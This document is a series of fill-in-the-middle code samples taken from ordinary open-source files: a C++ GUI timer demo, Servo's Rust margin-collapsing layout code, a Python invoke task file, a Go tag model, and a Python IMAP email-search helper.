<|file_name|>Timers.cpp<|end_file_name|><|fim▁begin|>// Vaca - Visual Application Components Abstraction // Copyright (c) 2005-2009 David Capello // // This file is distributed under the terms of the MIT license, // please read LICENSE.txt for more information. #include <vaca/vaca.h> #include "../resource.h" using namespace vaca; class TimerViewer : public Widget { Timer m_timer; bool m_on; public: TimerViewer(int msecs, Color color, Widget* parent) : Widget(parent) , m_timer(msecs) , m_on(false) { setBgColor(color); setPreferredSize(Size(64, 64)); m_timer.Tick.connect(&TimerViewer::onTick, this); m_timer.start(); } <|fim▁hole|> virtual void onPaint(PaintEvent& ev) { Graphics& g = ev.getGraphics(); Rect rc = getClientBounds(); Color bg = getBgColor(); Pen blackPen(Color::Black); Brush foreBrush(m_on ? getBgColor()+Color(200, 200, 200): getBgColor()); g.drawRect(blackPen, rc); rc.shrink(1); g.fillRect(foreBrush, rc); } private: void onTick() { // switch state m_on = !m_on; invalidate(true); } }; // the main window class MainFrame : public Frame { Label m_label1; Label m_label2; Label m_label3; TimerViewer m_timer1; TimerViewer m_timer2; TimerViewer m_timer3; public: MainFrame() : Frame(L"Timers", NULL, Frame::Styles::Default - Frame::Styles::Resizable - Frame::Styles::Maximizable) , m_label1(L"1 sec", this) , m_label2(L"2 sec", this) , m_label3(L"4 sec", this) , m_timer1(1000, Color::Red, this) , m_timer2(2000, Color(0, 128, 0), this) , m_timer3(4000, Color::Blue, this) { setLayout(Bix::parse(L"XY[%,%,%;%,%,%]", &m_label1, &m_label2, &m_label3, &m_timer1, &m_timer2, &m_timer3)); setSize(getPreferredSize()); } }; int VACA_MAIN() { Application app; MainFrame frm; frm.setIcon(ResourceId(IDI_VACA)); frm.setVisible(true); app.run(); return 0; }<|fim▁end|>
protected:
<|file_name|>model.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public * License, v. 2.0. If a copy of the MPL was not distributed with this * file, You can obtain one at http://mozilla.org/MPL/2.0/. */ //! Borders, padding, and margins. #![deny(unsafe_code)] use fragment::Fragment; use geom::{Matrix2D, SideOffsets2D, Size2D}; use std::cmp::{max, min}; use std::fmt; use style::computed_values::transform::ComputedMatrix; use style::properties::ComputedValues; use style::values::computed::{LengthAndPercentage, LengthOrPercentageOrAuto}; use style::values::computed::{LengthOrPercentageOrNone, LengthOrPercentage}; use util::geometry::Au; use util::logical_geometry::LogicalMargin; /// A collapsible margin. See CSS 2.1 § 8.3.1. #[derive(Copy)] pub struct AdjoiningMargins { /// The value of the greatest positive margin. pub most_positive: Au, /// The actual value (not the absolute value) of the negative margin with the largest absolute /// value. Since this is not the absolute value, this is always zero or negative. pub most_negative: Au, } impl AdjoiningMargins { pub fn new() -> AdjoiningMargins { AdjoiningMargins { most_positive: Au(0), most_negative: Au(0), } } pub fn from_margin(margin_value: Au) -> AdjoiningMargins { if margin_value >= Au(0) { AdjoiningMargins { most_positive: margin_value, most_negative: Au(0), } } else { AdjoiningMargins { most_positive: Au(0), most_negative: margin_value, } } } pub fn union(&mut self, other: AdjoiningMargins) { self.most_positive = max(self.most_positive, other.most_positive); self.most_negative = min(self.most_negative, other.most_negative) } pub fn collapse(&self) -> Au { self.most_positive + self.most_negative } } /// Represents the block-start and block-end margins of a flow with collapsible margins. See CSS 2.1 § 8.3.1. #[derive(Copy)] pub enum CollapsibleMargins { /// Margins may not collapse with this flow. None(Au, Au), /// Both the block-start and block-end margins (specified here in that order) may collapse, but the /// margins do not collapse through this flow. Collapse(AdjoiningMargins, AdjoiningMargins), /// Margins collapse *through* this flow. This means, essentially, that the flow doesn’t /// have any border, padding, or out-of-flow (floating or positioned) content CollapseThrough(AdjoiningMargins), } impl CollapsibleMargins { pub fn new() -> CollapsibleMargins { CollapsibleMargins::None(Au(0), Au(0)) } /// Returns the amount of margin that should be applied in a noncollapsible context. This is /// currently used to apply block-start margin for hypothetical boxes, since we do not collapse /// margins of hypothetical boxes. pub fn block_start_margin_for_noncollapsible_context(&self) -> Au { match *self { CollapsibleMargins::None(block_start, _) => block_start, CollapsibleMargins::Collapse(ref block_start, _) | CollapsibleMargins::CollapseThrough(ref block_start) => block_start.collapse(), } } } enum FinalMarginState { MarginsCollapseThrough, BottomMarginCollapses, } pub struct MarginCollapseInfo { pub state: MarginCollapseState, pub block_start_margin: AdjoiningMargins, pub margin_in: AdjoiningMargins, } impl MarginCollapseInfo { /// TODO(#2012, pcwalton): Remove this method once `fragment` is not an `Option`. 
pub fn new() -> MarginCollapseInfo { MarginCollapseInfo { state: MarginCollapseState::AccumulatingCollapsibleTopMargin, block_start_margin: AdjoiningMargins::new(), margin_in: AdjoiningMargins::new(), } } pub fn initialize_block_start_margin(&mut self, fragment: &Fragment, can_collapse_block_start_margin_with_kids: bool) { if !can_collapse_block_start_margin_with_kids { self.state = MarginCollapseState::AccumulatingMarginIn } self.block_start_margin = AdjoiningMargins::from_margin(fragment.margin.block_start) } pub fn finish_and_compute_collapsible_margins(mut self, fragment: &Fragment, can_collapse_block_end_margin_with_kids: bool) -> (CollapsibleMargins, Au) { let state = match self.state { MarginCollapseState::AccumulatingCollapsibleTopMargin => { match fragment.style().content_block_size() { LengthOrPercentageOrAuto::Auto | LengthOrPercentageOrAuto::Length(Au(0)) | LengthOrPercentageOrAuto::Percentage(0.) => { match fragment.style().min_block_size() { LengthOrPercentage::Length(Au(0)) | LengthOrPercentage::Percentage(0.) => { FinalMarginState::MarginsCollapseThrough }, _ => { // If the fragment has non-zero min-block-size, margins may not // collapse through it. FinalMarginState::BottomMarginCollapses } } }, _ => { // If the fragment has an explicitly specified block-size, margins may not // collapse through it. FinalMarginState::BottomMarginCollapses } } } MarginCollapseState::AccumulatingMarginIn => FinalMarginState::BottomMarginCollapses, }; // Different logic is needed here depending on whether this flow can collapse its block-end // margin with its children. let block_end_margin = fragment.margin.block_end; if !can_collapse_block_end_margin_with_kids { match state { FinalMarginState::MarginsCollapseThrough => { let advance = self.block_start_margin.collapse(); self.margin_in.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::Collapse(self.block_start_margin, self.margin_in), advance) } FinalMarginState::BottomMarginCollapses => { let advance = self.margin_in.collapse(); self.margin_in.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::Collapse(self.block_start_margin, self.margin_in), advance) } } } else { match state { FinalMarginState::MarginsCollapseThrough => { self.block_start_margin.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::CollapseThrough(self.block_start_margin), Au(0)) } FinalMarginState::BottomMarginCollapses => { self.margin_in.union(AdjoiningMargins::from_margin(block_end_margin)); (CollapsibleMargins::Collapse(self.block_start_margin, self.margin_in), Au(0)) } } } } pub fn current_float_ceiling(&mut self) -> Au { match self.state { MarginCollapseState::AccumulatingCollapsibleTopMargin => { // We do not include the top margin in the float ceiling, because the float flow // needs to be positioned relative to our *border box*, not our margin box. See // `tests/ref/float_under_top_margin_a.html`. Au(0) } MarginCollapseState::AccumulatingMarginIn => self.margin_in.collapse(), } } /// Adds the child's potentially collapsible block-start margin to the current margin state and /// advances the Y offset by the appropriate amount to handle that margin. Returns the amount /// that should be added to the Y offset during block layout. 
pub fn advance_block_start_margin(&mut self, child_collapsible_margins: &CollapsibleMargins) -> Au { match (self.state, *child_collapsible_margins) { (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::None(block_start, _)) => { self.state = MarginCollapseState::AccumulatingMarginIn; block_start } (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::Collapse(block_start, _)) => { self.block_start_margin.union(block_start); self.state = MarginCollapseState::AccumulatingMarginIn; Au(0) } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::None(block_start, _)) => { let previous_margin_value = self.margin_in.collapse(); self.margin_in = AdjoiningMargins::new(); previous_margin_value + block_start } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::Collapse(block_start, _)) => { self.margin_in.union(block_start); let margin_value = self.margin_in.collapse(); self.margin_in = AdjoiningMargins::new(); margin_value } (_, CollapsibleMargins::CollapseThrough(_)) => { // For now, we ignore this; this will be handled by `advance_block-end_margin` below. Au(0) } } } /// Adds the child's potentially collapsible block-end margin to the current margin state and /// advances the Y offset by the appropriate amount to handle that margin. Returns the amount /// that should be added to the Y offset during block layout. pub fn advance_block_end_margin(&mut self, child_collapsible_margins: &CollapsibleMargins) -> Au { match (self.state, *child_collapsible_margins) { (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::None(..)) | (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::Collapse(..)) => { // Can't happen because the state will have been replaced with // `MarginCollapseState::AccumulatingMarginIn` above. panic!("should not be accumulating collapsible block_start margins anymore!") } (MarginCollapseState::AccumulatingCollapsibleTopMargin, CollapsibleMargins::CollapseThrough(margin)) => { self.block_start_margin.union(margin); Au(0) } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::None(_, block_end)) => { assert_eq!(self.margin_in.most_positive, Au(0)); assert_eq!(self.margin_in.most_negative, Au(0)); block_end } (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::Collapse(_, block_end)) | (MarginCollapseState::AccumulatingMarginIn, CollapsibleMargins::CollapseThrough(block_end)) => { self.margin_in.union(block_end); Au(0) } } } } #[derive(Copy)] pub enum MarginCollapseState { AccumulatingCollapsibleTopMargin, AccumulatingMarginIn, } /// Intrinsic inline-sizes, which consist of minimum and preferred. #[derive(RustcEncodable)] pub struct IntrinsicISizes { /// The *minimum inline-size* of the content. pub minimum_inline_size: Au, /// The *preferred inline-size* of the content. pub preferred_inline_size: Au, } impl fmt::Debug for IntrinsicISizes { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "min={:?}, pref={:?}", self.minimum_inline_size, self.preferred_inline_size) } } impl IntrinsicISizes { pub fn new() -> IntrinsicISizes { IntrinsicISizes { minimum_inline_size: Au(0), preferred_inline_size: Au(0), } } } /// The temporary result of the computation of intrinsic inline-sizes. pub struct IntrinsicISizesContribution { /// Intrinsic sizes for the content only (not counting borders, padding, or margins). pub content_intrinsic_sizes: IntrinsicISizes, /// The inline size of borders and padding, as well as margins if appropriate. 
pub surrounding_size: Au, } impl IntrinsicISizesContribution { /// Creates and initializes an inline size computation with all sizes set to zero. pub fn new() -> IntrinsicISizesContribution { IntrinsicISizesContribution { content_intrinsic_sizes: IntrinsicISizes::new(), surrounding_size: Au(0), } } /// Adds the content intrinsic sizes and the surrounding size together to yield the final /// intrinsic size computation. pub fn finish(self) -> IntrinsicISizes { IntrinsicISizes { minimum_inline_size: self.content_intrinsic_sizes.minimum_inline_size + self.surrounding_size, preferred_inline_size: self.content_intrinsic_sizes.preferred_inline_size + self.surrounding_size, } } /// Updates the computation so that the minimum is the maximum of the current minimum and the /// given minimum and the preferred is the sum of the current preferred and the given /// preferred. This is used when laying out fragments in the inline direction. /// /// FIXME(pcwalton): This is incorrect when the inline fragment contains forced line breaks /// (e.g. `<br>` or `white-space: pre`). pub fn union_inline(&mut self, sizes: &IntrinsicISizes) { self.content_intrinsic_sizes.minimum_inline_size = max(self.content_intrinsic_sizes.minimum_inline_size, sizes.minimum_inline_size); self.content_intrinsic_sizes.preferred_inline_size = self.content_intrinsic_sizes.preferred_inline_size + sizes.preferred_inline_size } /// Updates the computation so that the minimum is the sum of the current minimum and the /// given minimum and the preferred is the sum of the current preferred and the given /// preferred. This is used when laying out fragments in the inline direction when /// `white-space` is `pre` or `nowrap`. pub fn union_nonbreaking_inline(&mut self, sizes: &IntrinsicISizes) { self.content_intrinsic_sizes.minimum_inline_size = self.content_intrinsic_sizes.minimum_inline_size + sizes.minimum_inline_size; self.content_intrinsic_sizes.preferred_inline_size = self.content_intrinsic_sizes.preferred_inline_size + sizes.preferred_inline_size } /// Updates the computation so that the minimum is the maximum of the current minimum and the /// given minimum and the preferred is the maximum of the current preferred and the given /// preferred. This can be useful when laying out fragments in the block direction (but note /// that it does not take floats into account, so `BlockFlow` does not use it). /// /// This is used when contributing the intrinsic sizes for individual fragments. pub fn union_block(&mut self, sizes: &IntrinsicISizes) { self.content_intrinsic_sizes.minimum_inline_size = max(self.content_intrinsic_sizes.minimum_inline_size, sizes.minimum_inline_size); self.content_intrinsic_sizes.preferred_inline_size = max(self.content_intrinsic_sizes.preferred_inline_size, sizes.preferred_inline_size) } } /// Useful helper data type when computing values for blocks and positioned elements. 
#[derive(Copy, PartialEq, Debug)] pub enum MaybeAuto { Auto, Specified(Au), } impl MaybeAuto { #[inline] pub fn from_style(length: LengthOrPercentageOrAuto, containing_length: Au) -> MaybeAuto { match length { LengthOrPercentageOrAuto::Auto => MaybeAuto::Auto, LengthOrPercentageOrAuto::Percentage(percent) => { MaybeAuto::Specified(containing_length.scale_by(percent)) } LengthOrPercentageOrAuto::Length(length) => MaybeAuto::Specified(length) } } #[inline] pub fn specified_or_default(&self, default: Au) -> Au { match *self { MaybeAuto::Auto => default, MaybeAuto::Specified(value) => value, } } #[inline] pub fn specified_or_zero(&self) -> Au { self.specified_or_default(Au::new(0)) } #[inline] pub fn map<F>(&self, mapper: F) -> MaybeAuto where F: FnOnce(Au) -> Au { match *self { MaybeAuto::Auto => MaybeAuto::Auto, MaybeAuto::Specified(value) => MaybeAuto::Specified(mapper(value)), } } } pub fn specified_or_none(length: LengthOrPercentageOrNone, containing_length: Au) -> Option<Au> { match length { LengthOrPercentageOrNone::None => None, LengthOrPercentageOrNone::Percentage(percent) => Some(containing_length.scale_by(percent)), LengthOrPercentageOrNone::Length(length) => Some(length),<|fim▁hole|> match length { LengthOrPercentage::Length(length) => length, LengthOrPercentage::Percentage(p) => containing_length.scale_by(p) } } #[inline] pub fn padding_from_style(style: &ComputedValues, containing_block_inline_size: Au) -> LogicalMargin<Au> { let padding_style = style.get_padding(); LogicalMargin::from_physical(style.writing_mode, SideOffsets2D::new( specified(padding_style.padding_top, containing_block_inline_size), specified(padding_style.padding_right, containing_block_inline_size), specified(padding_style.padding_bottom, containing_block_inline_size), specified(padding_style.padding_left, containing_block_inline_size))) } pub trait ToGfxMatrix { fn to_gfx_matrix(&self, containing_size: &Size2D<Au>) -> Matrix2D<f32>; } impl ToGfxMatrix for ComputedMatrix { fn to_gfx_matrix(&self, containing_size: &Size2D<Au>) -> Matrix2D<f32> { Matrix2D::new(self.m11 as f32, self.m12 as f32, self.m21 as f32, self.m22 as f32, self.m31.to_au(containing_size.width).to_subpx() as f32, self.m32.to_au(containing_size.height).to_subpx() as f32) } } trait ToAu { fn to_au(&self, containing_size: Au) -> Au; } impl ToAu for LengthAndPercentage { #[inline] fn to_au(&self, containing_size: Au) -> Au { self.length + Au::from_frac_px(self.percentage * containing_size.to_subpx()) } }<|fim▁end|>
} } pub fn specified(length: LengthOrPercentage, containing_length: Au) -> Au {
<|file_name|>tasks.py<|end_file_name|><|fim▁begin|>import os from invoke import task WHEELHOUSE_PATH = os.environ.get('WHEELHOUSE') def monkey_patch(ctx): # Force an older cacert.pem from certifi v2015.4.28, prevents an ssl failure w/ identity.api.rackspacecloud.com. # # SubjectAltNameWarning: Certificate for identity.api.rackspacecloud.com has no `subjectAltName`, falling # back to check for a `commonName` for now. This feature is being removed by major browsers and deprecated by # RFC 2818. (See https://github.com/shazow/urllib3/issues/497 for details.) # SubjectAltNameWarning import ssl import certifi _create_default_context = ssl.create_default_context def create_default_context(purpose=ssl.Purpose.SERVER_AUTH, *, cafile=None, capath=None, cadata=None): if cafile is None: cafile = certifi.where() return _create_default_context(purpose=purpose, cafile=cafile, capath=capath, cadata=cadata) ssl.create_default_context = create_default_context @task def wheelhouse(ctx, develop=False, pty=True): req_file = 'dev-requirements.txt' if develop else 'requirements.txt' cmd = 'pip wheel --find-links={} -r {} --wheel-dir={}'.format(WHEELHOUSE_PATH, req_file, WHEELHOUSE_PATH) ctx.run(cmd, pty=pty) @task def install(ctx, develop=False, pty=True): ctx.run('python setup.py develop') req_file = 'dev-requirements.txt' if develop else 'requirements.txt' cmd = 'pip install --upgrade -r {}'.format(req_file) if WHEELHOUSE_PATH: cmd += ' --no-index --find-links={}'.format(WHEELHOUSE_PATH) ctx.run(cmd, pty=pty) @task def flake(ctx): """ Run style and syntax checker. Follows options defined in setup.cfg """ ctx.run('flake8 .', pty=True) @task def mypy(ctx): """ Check python types using mypy (additional level of linting). Follows options defined in setup.cfg """ ctx.run('mypy waterbutler/', pty=True)<|fim▁hole|> flake(ctx) if types: mypy(ctx) cmd = 'py.test --cov-report term-missing --cov waterbutler tests' if verbose: cmd += ' -v' ctx.run(cmd, pty=True) @task def celery(ctx, loglevel='INFO', hostname='%h'): monkey_patch(ctx) from waterbutler.tasks.app import app command = ['worker'] if loglevel: command.extend(['--loglevel', loglevel]) if hostname: command.extend(['--hostname', hostname]) app.worker_main(command) @task def rabbitmq(ctx): ctx.run('rabbitmq-server', pty=True) @task def server(ctx): monkey_patch(ctx) if os.environ.get('REMOTE_DEBUG', None): import pydevd # e.g. '127.0.0.1:5678' remote_parts = os.environ.get('REMOTE_DEBUG').split(':') pydevd.settrace(remote_parts[0], port=int(remote_parts[1]), suspend=False, stdoutToServer=True, stderrToServer=True) from waterbutler.server.app import serve serve() @task def clean(ctx, verbose=False): cmd = 'find . -name "*.pyc" -delete' if verbose: print(cmd) ctx.run(cmd, pty=True)<|fim▁end|>
@task def test(ctx, verbose=False, types=False):
<|file_name|>tag.go<|end_file_name|><|fim▁begin|>package model const ( // TypeUser . TypeUser = int32(0) // 普通tag // TypeUser tag type // TypeUpper . TypeUpper = int32(1) // up主tag // TypeOfficailCategory . TypeOfficailCategory = int32(2) // 官方-分类tag // TypeOfficailContent . TypeOfficailContent = int32(3) // 官方-内容tag // TypeOfficailActivity . TypeOfficailActivity = int32(4) // 官方-活动tag // TagStateNormal . TagStateNormal = int32(0) // tag state // TagStateDelete . TagStateDelete = int32(1) // TagStateHide . TagStateHide = int32(2) // AttrNo . AttrNo = int32(0) // attr // AttrYes . AttrYes = int32(1) // SpamActionAdd . SpamActionAdd = int32(1) // spam // SpamActionDel . SpamActionDel = int32(2)<|fim▁hole|> TnameMaxLen = 32 // MaxSubNum MaxSubNum. MaxSubNum = 400 // UserBannedNone . UserBannedNone = int32(0) // ChannelMaxGroups channel max groups num. ChannelMaxGroups = int32(8) ) // Detail . type Detail struct { Info *Tag `json:"info"` Similar []*TagSimilar `json:"similar"` } // Filter . type Filter struct { Level int `json:"level"` Msg string `json:"msg"` } // Synonym . type Synonym struct { Parent int64 `json:"parent"` Childs []int64 `json:"childs"` } // HotTags . type HotTags struct { Rid int64 `json:"rid"` Tags []*HotTag `json:"tags"` } // HotTag . type HotTag struct { Rid int64 `json:"-"` Tid int64 `json:"tid"` Tname string `json:"tname"` HighLight int64 `json:"highlight"` IsAtten int8 `json:"is_atten"` } // UploadTag . type UploadTag struct { Rid int64 `json:"rid"` Tid int64 `json:"tid"` Tname string `json:"tname"` Rank int64 `json:"rank"` IsBusiness int8 `json:"-"` }<|fim▁end|>
// TnameMaxLen .
<|file_name|>email_manager.py<|end_file_name|><|fim▁begin|>""" EmailManager - a helper class to login, search for, and delete emails. """ import email import htmlentitydefs import imaplib import quopri import re import time import types from seleniumbase.config import settings class EmailManager: """ A helper class to interface with an Email account. These imap methods can search for and fetch messages without needing a browser. Example: em = EmailManager() result = em.check_for_recipient( "[GMAIL.USER]+[SOME CODE OR TIMESTAMP KEY]@gmail.com") """ HTML = "text/html" PLAIN = "text/plain" TIMEOUT = 1800 def __init__(self, uname=settings.EMAIL_USERNAME, pwd=settings.EMAIL_PASSWORD, imap_string=settings.EMAIL_IMAP_STRING, port=settings.EMAIL_IMAP_PORT): self.uname = uname self.pwd = pwd self.imap_string = imap_string self.port = port def imap_connect(self): """ Connect to the IMAP mailbox. """ self.mailbox = imaplib.IMAP4_SSL(self.imap_string, self.port) self.mailbox.login(self.uname, self.pwd) self.mailbox.select() def imap_disconnect(self): """ Disconnect from the IMAP mailbox. """ self.mailbox.close() self.mailbox.logout() def __imap_search(self, ** criteria_dict): """ Searches for query in the given IMAP criteria and returns the message numbers that match as a list of strings. Criteria without values (eg DELETED) should be keyword args with KEY=True, or else not passed. Criteria with values should be keyword args of the form KEY="VALUE" where KEY is a valid IMAP key. IMAP default is to AND all criteria together. We don't support other logic quite yet. All valid keys: ALL, ANSWERED, BCC <string>, BEFORE <string>, BODY <string>, CC <string>, DELETED, DRAFT, FLAGGED, FROM <string>, HEADER <field-name> <string> (UNTESTED), KEYWORD <flag>, LARGER <n>, NEW, NOT <search-key>, OLD, ON <date>, OR <search-key1> <search-key2> (UNTESTED), RECENT, SEEN, SENTBEFORE <date>, SENTON <date>, SENTSINCE <date>, SINCE <date>, SMALLER <n>, SUBJECT <string>, TEXT <string>, TO <string>, UID <sequence set>, UNANSWERED, UNDELETED, UNDRAFT, UNFLAGGED, UNKEYWORD <flag>, UNSEEN. For details on keys and their values, see http://tools.ietf.org/html/rfc3501#section-6.4.4 :param criteria_dict: dictionary of search criteria keywords :raises: EmailException if something in IMAP breaks :returns: List of message numbers as strings matched by given criteria """ self.imap_connect() criteria = [] for key in criteria_dict: if criteria_dict[key] is True: criteria.append('(%s)' % key) else: criteria.append('(%s "%s")' % (key, criteria_dict[key])) # If any of these criteria are not valid IMAP keys, IMAP will tell us. 
status, msg_nums = self.mailbox.search('UTF-8', * criteria) self.imap_disconnect() if 0 == len(msg_nums): msg_nums = [] if 'OK' in status: return self.__parse_imap_search_result(msg_nums) else: raise EmailException("IMAP status is " + str(status)) def remove_formatting(self, html): """ Clean out any whitespace @Params html - String of html to remove whitespace from @Returns Cleaned string """ return ' '.join(html.split()) def __parse_imap_search_result(self, result): """ This takes the result of imap_search and returns SANE results @Params result - result from an imap_search call @Returns List of IMAP search results """ if isinstance(result, types.ListType): # Above is same as "type(result) == types.ListType" if len(result) == 1: return self.__parse_imap_search_result(result[0]) else: return result elif isinstance(result, types.StringType): # Above is same as "type(result) == types.StringType" return result.split() else: # Fail silently assuming tests will fail if emails are not found return [] def fetch_html(self, msg_nums): """ Given a message number that we found with imap_search, get the text/html content. @Params msg_nums - message number to get html message for @Returns HTML content of message matched by message number """ if not msg_nums: raise Exception("Invalid Message Number!") return self.__imap_fetch_content_type(msg_nums, self.HTML) def fetch_plaintext(self, msg_nums): """ Given a message number that we found with imap_search, get the text/plain content. @Params msg_nums - message number to get message for @Returns Plaintext content of message matched by message number """ if not msg_nums: raise Exception("Invalid Message Number!") return self.__imap_fetch_content_type(msg_nums, self.PLAIN) def __imap_fetch_content_type(self, msg_nums, content_type): """ Given a message number that we found with imap_search, fetch the whole source, dump that into an email object, and pick out the part that matches the content type specified. Return that, if we got multiple emails, return dict of all the parts. @Params msg_nums - message number to search for content_type - content type of email message to return @Returns Specified content type string or dict of all content types of matched email. """ if not msg_nums: raise Exception("Invalid Message Number!") if not content_type: raise Exception("Need a content type!") contents = {} self.imap_connect() for num in msg_nums: status, data = self.mailbox.fetch(num, "(RFC822)") for response_part in data: if isinstance(response_part, tuple): msg = email.message_from_string(response_part[1]) for part in msg.walk(): if str(part.get_content_type()) == content_type: content = str(part.get_payload(decode=True)) contents[int(num)] = content self.imap_disconnect() return contents def fetch_html_by_subject(self, email_name): """ Get the html of an email, searching by subject. @Params email_name - the subject to search for @Returns HTML content of the matched email """ if not email_name: raise EmailException("Subject cannot be null") results = self.__imap_search(SUBJECT=email_name) sources = self.fetch_html(results) return sources def fetch_plaintext_by_subject(self, email_name): """ Get the plain text of an email, searching by subject. 
@Params email_name - the subject to search for @Returns Plaintext content of the matched email """ if not email_name: raise EmailException("Subject cannot be null") results = self.__imap_search(SUBJECT=email_name) sources = self.fetch_plaintext(results) return sources def search_for_recipient(self, email, timeout=None, content_type=None): """ Get content of emails, sent to a specific email address. @Params email - the recipient email address to search for timeout - seconds to try beore timing out content_type - type of email string to return @Returns Content of the matched email in the given content type """ return self.search(timeout=timeout, content_type=content_type, TO=email) def search_for_subject(self, subject, timeout=None, content_type=None): """ Get content of emails, sent to a specific email address. @Params email - the recipient email address to search for timeout - seconds to try beore timing out content_type - type of email string to return @Returns Content of the matched email in the given content type """ return self.search(timeout=timeout, content_type=content_type, SUBJECT=subject) def search_for_count(self, ** args): """ A search that keeps searching up until timeout for a specific number of matches to a search. If timeout is not specified we use the default. If count= is not specified we will fail. Return values are the same as search(), except for count=0, where we will return an empty list. Use this if you need to wait for a number of emails other than 1. @Params args - dict of arguments to use in search: count - number of emails to search for timeout - seconds to try search before timing out @Returns List of message numbers matched by search """ if "timeout" not in args.keys(): timeout = self.TIMEOUT elif args["timeout"]: timeout = args["timeout"] args["timeout"] = timeout / 15 if "count" not in args.keys(): raise EmailException("Count param not defined!") else: count = int(args["count"]) del args["count"] results = None timer = timeout count = 0 while count < timer: try: results = self.search(** args) except EmailException: if count == 0: return [] if results and len(results) == count: return results else: time.sleep(15) count += 15 if count >= timer: raise EmailException("Failed to match criteria %s in %s minutes" % (args, timeout / 60)) def __check_msg_for_headers(self, msg, ** email_headers): """ Checks an Email.Message object for the headers in email_headers. Following are acceptable header names: ['Delivered-To', 'Received', 'Return-Path', 'Received-SPF', 'Authentication-Results', 'DKIM-Signature', 'DomainKey-Signature', 'From', 'To', 'Message-ID', 'Subject', 'MIME-Version', 'Content-Type', 'Date', 'X-Sendgrid-EID', 'Sender']. @Params msg - the Email.message object to check email_headers - list of headers to check against @Returns Boolean whether all the headers were found """ all_headers_found = False email_headers['Delivered-To'] = email_headers['To'] email_headers.pop('To') all_headers_found = all(k in msg.keys() for k in email_headers) return all_headers_found def fetch_message(self, msgnum): """ Given a message number, return the Email.Message object. 
@Params msgnum - message number to find @Returns Email.Message object for the given message number """ self.imap_connect() status, data = self.mailbox.fetch(msgnum, "(RFC822)") self.imap_disconnect() for response_part in data: if isinstance(response_part, tuple): return email.message_from_string(response_part[1]) def get_content_type(self, msg, content_type="HTML"): """ Given an Email.Message object, gets the content-type payload as specified by @content_type. This is the actual body of the email. @Params msg - Email.Message object to get message content for content_type - Type of content to get from the email @Return String content of the email in the given type """ if "HTML" in content_type.upper(): content_type = self.HTML elif "PLAIN" in content_type.upper(): content_type = self.PLAIN for part in msg.walk(): if str(part.get_content_type()) == content_type: return str(part.get_payload(decode=True)) def search(self, ** args): """ Checks email inbox every 15 seconds that match the criteria up until timeout. Search criteria should be keyword args eg TO="[email protected]". See __imap_search docstring for list of valid criteria. If content_type is not defined, will return a list of msg numbers. Options: - fetch: will return a dict of Message objects, keyed on msgnum, which can be used to look at headers and other parts of the complete message. (http://docs.python.org/library/email.message.html) - timeout: will replace the default module timeout with the value in SECONDS. - content_type: should be either "PLAIN" or "HTML". If defined returns the source of the matched messages as a dict of msgnum:content. If not defined we return a list of msg nums. """ if "content_type" not in args.keys(): content_type = None elif "HTML" in args["content_type"]: content_type = self.HTML del args["content_type"] elif "PLAIN" in args["content_type"]: content_type = self.PLAIN del args["content_type"] elif args["content_type"]: content_type = args['content_type'] del args["content_type"] if "timeout" not in args.keys(): timeout = self.TIMEOUT elif "timeout" in args: timeout = args["timeout"] del args["timeout"] fetch = False if "fetch" in args.keys(): fetch = True del args["fetch"] results = None timer = timeout count = 0 while count < timer: results = self.__imap_search(** args) if len(results) > 0: if fetch: msgs = {} for msgnum in results: msgs[msgnum] = self.fetch_message(msgnum) return msgs elif not content_type: return results else: return self.__imap_fetch_content_type(results, content_type) else: time.sleep(15) count += 15 if count >= timer: raise EmailException( "Failed to find message for criteria %s in %s minutes" % (args, timeout / 60)) def remove_whitespace(self, html): """ Clean whitespace from html @Params html - html source to remove whitespace from @Returns String html without whitespace """ # Does python have a better way to do exactly this? 
clean_html = html for char in ("\r", "\n", "\t"): clean_html = clean_html.replace(char, "") return clean_html def remove_control_chars(self, html): """ Clean control characters from html @Params html - html source to remove control characters from @Returns String html without control characters """ return self.remove_whitespace(html) def replace_entities(self, html): """ Replace htmlentities with unicode characters @Params html - html source to replace entities in @Returns String html with entities replaced """ def fixup(text): """replace the htmlentities in some text""" text = text.group(0) if text[:2] == "&#": # character reference try: if text[:3] == "&#x": return unichr(int(text[3:-1], 16)) else: return unichr(int(text[2:-1])) except ValueError: pass else: # named entity try: text = unichr(htmlentitydefs.name2codepoint[text[1:-1]]) except KeyError: pass return text # leave as is return re.sub("&#?\w+;", fixup, html) def decode_quoted_printable(self, html): """ Decoding from Quoted-printable, or QP encoding, that uses ASCII 7bit chars to encode 8 bit chars, resulting in =3D to represent '='. Python supports UTF-8 so we decode. Also removes line breaks with '= at the end.' @Params html - html source to decode<|fim▁hole|> @Returns String decoded HTML source """ return self.replace_entities(quopri.decodestring(html)) def html_bleach(self, html): """ Cleanup and get rid of all extraneous stuff for better comparison later. Turns formatted into into a single line string. @Params html - HTML source to clean up @Returns String cleaned up HTML source """ return self.decode_quoted_printable(html) class EmailException(Exception): """Raised when we have an Email-related problem.""" def __init__(self, value): self.parameter = value def __str__(self): return repr(self.parameter)<|fim▁end|>
